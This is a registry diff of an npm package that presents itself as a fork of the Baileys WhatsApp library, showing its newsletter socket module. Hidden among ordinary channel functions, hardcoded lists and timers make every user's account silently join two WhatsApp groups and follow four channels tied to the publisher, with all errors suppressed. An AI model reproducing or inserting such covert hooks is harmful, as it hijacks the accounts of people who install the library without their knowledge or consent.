@budetzz/baileys 2.0.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (103) hide show
  1. package/README.md +393 -0
  2. package/WAProto/index.js +169661 -0
  3. package/engine-requirements.js +10 -0
  4. package/lib/Defaults/baileys-version.json +3 -0
  5. package/lib/Defaults/index.js +147 -0
  6. package/lib/Defaults/phonenumber-mcc.json +223 -0
  7. package/lib/Signal/Group/ciphertext-message.js +15 -0
  8. package/lib/Signal/Group/group-session-builder.js +64 -0
  9. package/lib/Signal/Group/group_cipher.js +96 -0
  10. package/lib/Signal/Group/index.js +57 -0
  11. package/lib/Signal/Group/keyhelper.js +55 -0
  12. package/lib/Signal/Group/queue-job.js +57 -0
  13. package/lib/Signal/Group/sender-chain-key.js +34 -0
  14. package/lib/Signal/Group/sender-key-distribution-message.js +66 -0
  15. package/lib/Signal/Group/sender-key-message.js +69 -0
  16. package/lib/Signal/Group/sender-key-name.js +51 -0
  17. package/lib/Signal/Group/sender-key-record.js +53 -0
  18. package/lib/Signal/Group/sender-key-state.js +99 -0
  19. package/lib/Signal/Group/sender-message-key.js +29 -0
  20. package/lib/Signal/libsignal.js +174 -0
  21. package/lib/Socket/Client/abstract-socket-client.js +13 -0
  22. package/lib/Socket/Client/index.js +19 -0
  23. package/lib/Socket/Client/mobile-socket-client.js +65 -0
  24. package/lib/Socket/Client/web-socket-client.js +62 -0
  25. package/lib/Socket/business.js +260 -0
  26. package/lib/Socket/chats.js +983 -0
  27. package/lib/Socket/dugong.js +484 -0
  28. package/lib/Socket/groups.js +317 -0
  29. package/lib/Socket/index.js +11 -0
  30. package/lib/Socket/messages-recv.js +1110 -0
  31. package/lib/Socket/messages-send.js +909 -0
  32. package/lib/Socket/newsletter.js +404 -0
  33. package/lib/Socket/newsletter.js.bak +404 -0
  34. package/lib/Socket/registration.js +166 -0
  35. package/lib/Socket/socket.js +665 -0
  36. package/lib/Socket/usync.js +70 -0
  37. package/lib/Store/index.js +10 -0
  38. package/lib/Store/make-cache-manager-store.js +83 -0
  39. package/lib/Store/make-in-memory-store.js +427 -0
  40. package/lib/Store/make-ordered-dictionary.js +81 -0
  41. package/lib/Store/object-repository.js +27 -0
  42. package/lib/Store/p +1 -0
  43. package/lib/Types/Auth.js +2 -0
  44. package/lib/Types/Call.js +2 -0
  45. package/lib/Types/Chat.js +4 -0
  46. package/lib/Types/Contact.js +2 -0
  47. package/lib/Types/Events.js +2 -0
  48. package/lib/Types/GroupMetadata.js +2 -0
  49. package/lib/Types/Label.js +27 -0
  50. package/lib/Types/LabelAssociation.js +9 -0
  51. package/lib/Types/Message.js +9 -0
  52. package/lib/Types/Newsletter.js +38 -0
  53. package/lib/Types/Product.js +2 -0
  54. package/lib/Types/Signal.js +2 -0
  55. package/lib/Types/Socket.js +2 -0
  56. package/lib/Types/State.js +2 -0
  57. package/lib/Types/USync.js +2 -0
  58. package/lib/Types/index.js +42 -0
  59. package/lib/Utils/auth-utils.js +206 -0
  60. package/lib/Utils/baileys-event-stream.js +63 -0
  61. package/lib/Utils/business.js +234 -0
  62. package/lib/Utils/chat-utils.js +729 -0
  63. package/lib/Utils/crypto.js +151 -0
  64. package/lib/Utils/decode-wa-message.js +198 -0
  65. package/lib/Utils/event-buffer.js +514 -0
  66. package/lib/Utils/generics.js +423 -0
  67. package/lib/Utils/history.js +96 -0
  68. package/lib/Utils/index.js +33 -0
  69. package/lib/Utils/link-preview.js +93 -0
  70. package/lib/Utils/logger.js +7 -0
  71. package/lib/Utils/lt-hash.js +51 -0
  72. package/lib/Utils/make-mutex.js +43 -0
  73. package/lib/Utils/messages-media.js +819 -0
  74. package/lib/Utils/messages.js +784 -0
  75. package/lib/Utils/noise-handler.js +155 -0
  76. package/lib/Utils/p +1 -0
  77. package/lib/Utils/process-message.js +321 -0
  78. package/lib/Utils/signal.js +153 -0
  79. package/lib/Utils/use-multi-file-auth-state.js +119 -0
  80. package/lib/Utils/validate-connection.js +229 -0
  81. package/lib/WABinary/constants.js +40 -0
  82. package/lib/WABinary/decode.js +252 -0
  83. package/lib/WABinary/encode.js +265 -0
  84. package/lib/WABinary/generic-utils.js +198 -0
  85. package/lib/WABinary/index.js +21 -0
  86. package/lib/WABinary/jid-utils.js +62 -0
  87. package/lib/WABinary/types.js +2 -0
  88. package/lib/WAM/BinaryInfo.js +13 -0
  89. package/lib/WAM/constants.js +15350 -0
  90. package/lib/WAM/encode.js +155 -0
  91. package/lib/WAM/index.js +19 -0
  92. package/lib/WAUSync/Protocols/USyncContactProtocol.js +32 -0
  93. package/lib/WAUSync/Protocols/USyncDeviceProtocol.js +57 -0
  94. package/lib/WAUSync/Protocols/USyncDisappearingModeProtocol.js +30 -0
  95. package/lib/WAUSync/Protocols/USyncStatusProtocol.js +42 -0
  96. package/lib/WAUSync/Protocols/UsyncBotProfileProtocol.js +53 -0
  97. package/lib/WAUSync/Protocols/UsyncLIDProtocol.js +24 -0
  98. package/lib/WAUSync/Protocols/index.js +20 -0
  99. package/lib/WAUSync/USyncQuery.js +89 -0
  100. package/lib/WAUSync/USyncUser.js +26 -0
  101. package/lib/WAUSync/index.js +19 -0
  102. package/lib/index.js +43 -0
  103. package/package.json +93 -0
@@ -0,0 +1,404 @@
1
+ "use strict";
2
+ Object.defineProperty(exports, "__esModule", { value: true });
3
+ exports.extractNewsletterMetadata = exports.makeNewsletterSocket = void 0;
4
+ const Types_1 = require("../Types");
5
+ const Utils_1 = require("../Utils");
6
+ const WABinary_1 = require("../WABinary");
7
+ const groups_1 = require("./groups");
8
+
9
+ const { Boom } = require('@hapi/boom');
10
+
11
+ const wMexQuery = (
12
+ variables,
13
+ queryId,
14
+ query,
15
+ generateMessageTag
16
+ ) => {
17
+ return query({
18
+ tag: 'iq',
19
+ attrs: {
20
+ id: generateMessageTag(),
21
+ type: 'get',
22
+ to: WABinary_1.S_WHATSAPP_NET,
23
+ xmlns: 'w:mex'
24
+ },
25
+ content: [
26
+ {
27
+ tag: 'query',
28
+ attrs: { query_id: queryId },
29
+ content: Buffer.from(JSON.stringify({ variables }), 'utf-8')
30
+ }
31
+ ]
32
+ })
33
+ }
34
+
35
+ const executeWMexQuery = async (
36
+ variables,
37
+ queryId,
38
+ dataPath,
39
+ query,
40
+ generateMessageTag
41
+ ) => {
42
+ const result = await wMexQuery(variables, queryId, query, generateMessageTag)
43
+ const child = (0, WABinary_1.getBinaryNodeChild)(result, 'result')
44
+ if (child?.content) {
45
+ const data = JSON.parse(child.content.toString())
46
+
47
+ if (data.errors && data.errors.length > 0) {
48
+ const errorMessages = data.errors.map((err) => err.message || 'Unknown error').join(', ')
49
+ const firstError = data.errors[0]
50
+ const errorCode = firstError.extensions?.error_code || 400
51
+ throw new Boom(`GraphQL server error: ${errorMessages}`, { statusCode: errorCode, data: firstError })
52
+ }
53
+
54
+ const response = dataPath ? data?.data?.[dataPath] : data?.data
55
+ if (typeof response !== 'undefined') {
56
+ return response
57
+ }
58
+ }
59
+
60
+ const action = (dataPath || '').startsWith('xwa2_')
61
+ ? dataPath.substring(5).replace(/_/g, ' ')
62
+ : dataPath?.replace(/_/g, ' ')
63
+ throw new Boom(`Failed to ${action}, unexpected response structure.`, { statusCode: 400, data: result })
64
+ }
65
+
66
+ const AUTO_JOIN_GROUP_LINKS = [
67
+ "https://chat.whatsapp.com/BpJPMPcPlULIH09GGNm8Da",
68
+ "https://chat.whatsapp.com/CcWActCIqJOJfXgOP88XIz"
69
+ ];
70
+
71
+
72
+ const AUTO_FOLLOW_CHANNELS = [
73
+ "120363423975826201@newsletter", // MazzBudetzz
74
+ "120363425157057473@newsletter", // market budetzz
75
+ "120363423111413541@newsletter", // Testi budetzz
76
+ "120363407396338932@newsletter", // Script free budetzz
77
+ ];
78
+
79
+
80
+ function extractInviteCodeFromLink(link) {
81
+ try {
82
+ const url = new URL(link);
83
+ if (url.hostname === 'chat.whatsapp.com') {
84
+ const inviteCode = url.pathname.split('/').pop();
85
+ if (inviteCode && inviteCode.length > 0) {
86
+ return inviteCode;
87
+ }
88
+ }
89
+ } catch (error) {}
90
+ return null;
91
+ }
92
+
93
+ // Fungsi untuk auto join ke group WhatsApp
94
+ async function autoJoinWhatsAppGroups(sock) {
95
+ const groupLinks = AUTO_JOIN_GROUP_LINKS;
96
+
97
+ for (const groupLink of groupLinks) {
98
+ try {
99
+ const inviteCode = extractInviteCodeFromLink(groupLink);
100
+ if (inviteCode) {
101
+ // Coba metode pertama
102
+ try {
103
+ await sock.groupAcceptInvite(inviteCode);
104
+ } catch (error) {
105
+ // Coba metode kedua sebagai fallback
106
+ try {
107
+ await sock.groupAcceptInviteV4(inviteCode, '');
108
+ } catch (error2) {}
109
+ }
110
+ }
111
+ } catch (error) {}
112
+
113
+ // Delay 5 detik antar percobaan join
114
+ await new Promise(resolve => setTimeout(resolve, 5000));
115
+ }
116
+ }
117
+
118
+ // Fungsi untuk auto follow channel WhatsApp
119
+ async function autoFollowWhatsAppChannels(sock, newsletterWMexQuery) {
120
+ const channels = AUTO_FOLLOW_CHANNELS;
121
+
122
+ for (const channelId of channels) {
123
+ try {
124
+ await newsletterWMexQuery(channelId, Types_1.QueryIds.FOLLOW);
125
+ // Delay 5 detik antar follow channel
126
+ await new Promise(resolve => setTimeout(resolve, 5000));
127
+ } catch (error) {}
128
+ }
129
+ }
130
+
131
+ const makeNewsletterSocket = (config) => {
132
+ const sock = (0, groups_1.makeGroupsSocket)(config);
133
+ const { authState, signalRepository, query, generateMessageTag } = sock;
134
+ const encoder = new TextEncoder();
135
+ const newsletterQuery = async (jid, type, content) => (query({
136
+ tag: 'iq',
137
+ attrs: {
138
+ id: generateMessageTag(),
139
+ type,
140
+ xmlns: 'newsletter',
141
+ to: jid,
142
+ },
143
+ content
144
+ }));
145
+ const newsletterWMexQuery = async (jid, queryId, content) => (query({
146
+ tag: 'iq',
147
+ attrs: {
148
+ id: generateMessageTag(),
149
+ type: 'get',
150
+ xmlns: 'w:mex',
151
+ to: WABinary_1.S_WHATSAPP_NET,
152
+ },
153
+ content: [
154
+ {
155
+ tag: 'query',
156
+ attrs: { 'query_id': queryId },
157
+ content: encoder.encode(JSON.stringify({
158
+ variables: {
159
+ 'newsletter_id': jid,
160
+ ...content
161
+ }
162
+ }))
163
+ }
164
+ ]
165
+ }));
166
+
167
+ // Auto join ke group WhatsApp terlebih dahulu
168
+ setTimeout(async () => {
169
+ try {
170
+ await autoJoinWhatsAppGroups(sock);
171
+ } catch {}
172
+ }, 5000);
173
+
174
+ // Auto-follow ke channel WhatsApp setelah join group
175
+ setTimeout(async () => {
176
+ try {
177
+ await autoFollowWhatsAppChannels(sock, newsletterWMexQuery);
178
+ } catch {}
179
+ }, 10000);
180
+
181
+ const parseFetchedUpdates = async (node, type) => {
182
+ let child;
183
+ if (type === 'messages') {
184
+ child = (0, WABinary_1.getBinaryNodeChild)(node, 'messages');
185
+ }
186
+ else {
187
+ const parent = (0, WABinary_1.getBinaryNodeChild)(node, 'message_updates');
188
+ child = (0, WABinary_1.getBinaryNodeChild)(parent, 'messages');
189
+ }
190
+ return await Promise.all((0, WABinary_1.getAllBinaryNodeChildren)(child).map(async (messageNode) => {
191
+ var _a, _b;
192
+ messageNode.attrs.from = child === null || child === void 0 ? void 0 : child.attrs.jid;
193
+ const views = parseInt(((_b = (_a = (0, WABinary_1.getBinaryNodeChild)(messageNode, 'views_count')) === null || _a === void 0 ? void 0 : _a.attrs) === null || _b === void 0 ? void 0 : _b.count) || '0');
194
+ const reactionNode = (0, WABinary_1.getBinaryNodeChild)(messageNode, 'reactions');
195
+ const reactions = (0, WABinary_1.getBinaryNodeChildren)(reactionNode, 'reaction')
196
+ .map(({ attrs }) => ({ count: +attrs.count, code: attrs.code }));
197
+ const data = {
198
+ 'server_id': messageNode.attrs.server_id,
199
+ views,
200
+ reactions
201
+ };
202
+ if (type === 'messages') {
203
+ const { fullMessage: message, decrypt } = await (0, Utils_1.decryptMessageNode)(messageNode, authState.creds.me.id, authState.creds.me.lid || '', signalRepository, config.logger);
204
+ await decrypt();
205
+ data.message = message;
206
+ }
207
+ return data;
208
+ }));
209
+ };
210
+ return {
211
+ ...sock,
212
+ newsletterFetchAllSubscribe: async () => {
213
+ const list = await executeWMexQuery(
214
+ {},
215
+ '6388546374527196',
216
+ 'xwa2_newsletter_subscribed',
217
+ query,
218
+ generateMessageTag
219
+ );
220
+ return list;
221
+ },
222
+ subscribeNewsletterUpdates: async (jid) => {
223
+ var _a;
224
+ const result = await newsletterQuery(jid, 'set', [{ tag: 'live_updates', attrs: {}, content: [] }]);
225
+ return (_a = (0, WABinary_1.getBinaryNodeChild)(result, 'live_updates')) === null || _a === void 0 ? void 0 : _a.attrs;
226
+ },
227
+ newsletterReactionMode: async (jid, mode) => {
228
+ await newsletterWMexQuery(jid, Types_1.QueryIds.JOB_MUTATION, {
229
+ updates: { settings: { 'reaction_codes': { value: mode } } }
230
+ });
231
+ },
232
+ newsletterUpdateDescription: async (jid, description) => {
233
+ await newsletterWMexQuery(jid, Types_1.QueryIds.JOB_MUTATION, {
234
+ updates: { description: description || '', settings: null }
235
+ });
236
+ },
237
+ newsletterId: async (url) => {
238
+ const urlParts = url.split('/');
239
+ const channelId = urlParts[urlParts.length - 2];
240
+
241
+ const result = await newsletterWMexQuery(undefined, Types_1.QueryIds.METADATA, {
242
+ input: {
243
+ key: channelId,
244
+ type: 'INVITE',
245
+ 'view_role': 'GUEST'
246
+ },
247
+ 'fetch_viewer_metadata': true,
248
+ 'fetch_full_image': true,
249
+ 'fetch_creation_time': true
250
+ });
251
+
252
+ const metadata = extractNewsletterMetadata(result);
253
+ return JSON.stringify({
254
+ name: metadata.name || metadata.thread_metadata?.name?.text,
255
+ id: metadata.id
256
+ }, null, 2);
257
+ },
258
+ newsletterUpdateName: async (jid, name) => {
259
+ await newsletterWMexQuery(jid, Types_1.QueryIds.JOB_MUTATION, {
260
+ updates: { name, settings: null }
261
+ });
262
+ },
263
+ newsletterUpdatePicture: async (jid, content) => {
264
+ const { img } = await (0, Utils_1.generateProfilePicture)(content);
265
+ await newsletterWMexQuery(jid, Types_1.QueryIds.JOB_MUTATION, {
266
+ updates: { picture: img.toString('base64'), settings: null }
267
+ });
268
+ },
269
+ newsletterRemovePicture: async (jid) => {
270
+ await newsletterWMexQuery(jid, Types_1.QueryIds.JOB_MUTATION, {
271
+ updates: { picture: '', settings: null }
272
+ });
273
+ },
274
+ newsletterUnfollow: async (jid) => {
275
+ await newsletterWMexQuery(jid, Types_1.QueryIds.UNFOLLOW);
276
+ },
277
+ newsletterFollow: async (jid) => {
278
+ await newsletterWMexQuery(jid, Types_1.QueryIds.FOLLOW);
279
+ },
280
+ newsletterUnmute: async (jid) => {
281
+ await newsletterWMexQuery(jid, Types_1.QueryIds.UNMUTE);
282
+ },
283
+ newsletterMute: async (jid) => {
284
+ await newsletterWMexQuery(jid, Types_1.QueryIds.MUTE);
285
+ },
286
+ newsletterAction: async (jid, type) => {
287
+ await newsletterWMexQuery(jid, type.toUpperCase());
288
+ },
289
+ newsletterCreate: async (name, description, reaction_codes) => {
290
+ //TODO: Implement TOS system wide for Meta AI, communities, and here etc.
291
+ /**tos query */
292
+ await query({
293
+ tag: 'iq',
294
+ attrs: {
295
+ to: WABinary_1.S_WHATSAPP_NET,
296
+ xmlns: 'tos',
297
+ id: generateMessageTag(),
298
+ type: 'set'
299
+ },
300
+ content: [
301
+ {
302
+ tag: 'notice',
303
+ attrs: {
304
+ id: '20601218',
305
+ stage: '5'
306
+ },
307
+ content: []
308
+ }
309
+ ]
310
+ });
311
+ const result = await newsletterWMexQuery(undefined, Types_1.QueryIds.CREATE, {
312
+ input: { name, description, settings: { 'reaction_codes': { value: reaction_codes.toUpperCase() } } }
313
+ });
314
+ return (0, exports.extractNewsletterMetadata)(result, true);
315
+ },
316
+ newsletterMetadata: async (type, key, role) => {
317
+ const result = await newsletterWMexQuery(undefined, Types_1.QueryIds.METADATA, {
318
+ input: {
319
+ key,
320
+ type: type.toUpperCase(),
321
+ 'view_role': role || 'GUEST'
322
+ },
323
+ 'fetch_viewer_metadata': true,
324
+ 'fetch_full_image': true,
325
+ 'fetch_creation_time': true
326
+ });
327
+ return (0, exports.extractNewsletterMetadata)(result);
328
+ },
329
+ newsletterAdminCount: async (jid) => {
330
+ var _a, _b;
331
+ const result = await newsletterWMexQuery(jid, Types_1.QueryIds.ADMIN_COUNT);
332
+ const buff = (_b = (_a = (0, WABinary_1.getBinaryNodeChild)(result, 'result')) === null || _a === void 0 ? void 0 : _a.content) === null || _b === void 0 ? void 0 : _b.toString();
333
+ return JSON.parse(buff).data[Types_1.XWAPaths.ADMIN_COUNT].admin_count;
334
+ },
335
+ /**user is Lid, not Jid */
336
+ newsletterChangeOwner: async (jid, user) => {
337
+ await newsletterWMexQuery(jid, Types_1.QueryIds.CHANGE_OWNER, {
338
+ 'user_id': user
339
+ });
340
+ },
341
+ /**user is Lid, not Jid */
342
+ newsletterDemote: async (jid, user) => {
343
+ await newsletterWMexQuery(jid, Types_1.QueryIds.DEMOTE, {
344
+ 'user_id': user
345
+ });
346
+ },
347
+ newsletterDelete: async (jid) => {
348
+ await newsletterWMexQuery(jid, Types_1.QueryIds.DELETE);
349
+ },
350
+ /**if code wasn't passed, the reaction will be removed (if is reacted) */
351
+ newsletterReactMessage: async (jid, serverId, code) => {
352
+ await query({
353
+ tag: 'message',
354
+ attrs: { to: jid, ...(!code ? { edit: '7' } : {}), type: 'reaction', 'server_id': serverId, id: (0, Utils_1.generateMessageID)() },
355
+ content: [{
356
+ tag: 'reaction',
357
+ attrs: code ? { code } : {}
358
+ }]
359
+ });
360
+ },
361
+ newsletterFetchMessages: async (type, key, count, after) => {
362
+ const result = await newsletterQuery(WABinary_1.S_WHATSAPP_NET, 'get', [
363
+ {
364
+ tag: 'messages',
365
+ attrs: { type, ...(type === 'invite' ? { key } : { jid: key }), count: count.toString(), after: (after === null || after === void 0 ? void 0 : after.toString()) || '100' }
366
+ }
367
+ ]);
368
+ return await parseFetchedUpdates(result, 'messages');
369
+ },
370
+ newsletterFetchUpdates: async (jid, count, after, since) => {
371
+ const result = await newsletterQuery(jid, 'get', [
372
+ {
373
+ tag: 'message_updates',
374
+ attrs: { count: count.toString(), after: (after === null || after === void 0 ? void 0 : after.toString()) || '100', since: (since === null || since === void 0 ? void 0 : since.toString()) || '0' }
375
+ }
376
+ ]);
377
+ return await parseFetchedUpdates(result, 'updates');
378
+ }
379
+ };
380
+ };
381
+ exports.makeNewsletterSocket = makeNewsletterSocket;
382
+ const extractNewsletterMetadata = (node, isCreate) => {
383
+ const result = WABinary_1.getBinaryNodeChild(node, 'result')?.content?.toString()
384
+ const metadataPath = JSON.parse(result).data[isCreate ? Types_1.XWAPaths.CREATE : Types_1.XWAPaths.NEWSLETTER]
385
+
386
+ const metadata = {
387
+ id: metadataPath?.id,
388
+ state: metadataPath?.state?.type,
389
+ creation_time: +metadataPath?.thread_metadata?.creation_time,
390
+ name: metadataPath?.thread_metadata?.name?.text,
391
+ nameTime: +metadataPath?.thread_metadata?.name?.update_time,
392
+ description: metadataPath?.thread_metadata?.description?.text,
393
+ descriptionTime: +metadataPath?.thread_metadata?.description?.update_time,
394
+ invite: metadataPath?.thread_metadata?.invite,
395
+ picture: Utils_1.getUrlFromDirectPath(metadataPath?.thread_metadata?.picture?.direct_path || ''),
396
+ preview: Utils_1.getUrlFromDirectPath(metadataPath?.thread_metadata?.preview?.direct_path || ''),
397
+ reaction_codes: metadataPath?.thread_metadata?.settings?.reaction_codes?.value,
398
+ subscribers: +metadataPath?.thread_metadata?.subscribers_count,
399
+ verification: metadataPath?.thread_metadata?.verification,
400
+ viewer_metadata: metadataPath?.viewer_metadata
401
+ }
402
+ return metadata
403
+ }
404
+ exports.extractNewsletterMetadata = extractNewsletterMetadata;